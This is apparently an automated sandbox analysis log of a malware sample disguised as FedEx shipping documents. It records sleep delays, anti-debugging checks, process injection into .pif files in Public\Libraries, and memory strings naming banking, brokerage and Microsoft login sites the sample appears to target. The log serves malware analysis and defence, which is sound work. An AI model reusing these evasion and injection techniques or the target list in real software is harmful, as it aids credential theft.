Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598058	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597720	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596592	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596479	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596365	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596123	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595577	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594370	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599874
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599764
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599655
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599436
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599327
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599217
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599109
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599000
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598888
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598781
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598671
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598535
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598406
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598295
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598175
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597641
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597468
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597249
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597137
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596954
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596848
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596720
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596595
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596468
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596334
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596134
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595995
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595865
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595713
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595576
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595368
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594569
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594312
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594155
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594000
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593842
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593708
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593582
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593460
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593351
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593241
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593132
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593023
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592913
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592804
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592695
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592585
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592476
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592366
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592257
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592148
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592014
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591896
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591763
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591617
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591483
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591381
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591257
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591147
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591037
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599765
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599435
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599271
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599155
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599037
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598922
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598797
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598687
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598469
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598344
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598234
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598125
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598016
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597906
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597797
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597687
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597578
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597469
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597359
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597249
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597140
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597031
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596911
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596774
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596440
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596294
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596162
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596033
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595913
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595812
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595703
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595593
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595480
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595375
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595266
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595156
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595047
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594937
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594827
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594719
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594594
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594484
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594375
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594265
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594154

Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltes>
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: hzwdvhxM.pif, 0000000C.00000002.3925790426.0000000023E81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1459096681.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1866772092.0000000027962000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1628044255.0000000027962000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1811277780.0000000027962000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3925568800.0000000027962000.00000004.00000020.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1591690735.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000D.00000002.1676910673.00000000006F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BC75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	API call chain: ExitProcess graph end node	graph_0-23390
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	API call chain: ExitProcess graph end node	graph_7-104118
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D6AEB0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02D6AEB0

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Code function: 7_2_2D439698 LdrInitializeThunk,

7_2_2D439698

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_0040CE09

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

7_2_004019F0

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D63E98 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02D63E98

Source: C:\Users\Public\ndpha.pif

Code function: 9_2_00593F6B mov esi, dword ptr fs:[00000030h]

9_2_00593F6B

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Code function: 7_2_0040ADB0 GetProcessHeap,HeapFree,

7_2_0040ADB0

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1
Source: C:\Users\Public\ndpha.pif	Code function: 9_2_00596510 SetUnhandledExceptionFilter,	9_2_00596510
Source: C:\Users\Public\ndpha.pif	Code function: 9_2_005961C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_005961C0

Source: C:\Users\Public\Libraries\hzwdvhxM.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Memory allocated: C:\Users\Public\Libraries\hzwdvhxM.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Memory allocated: C:\Users\Public\Libraries\hzwdvhxM.pif base: 400000 protect: page execute and read and write	Jump to behavior
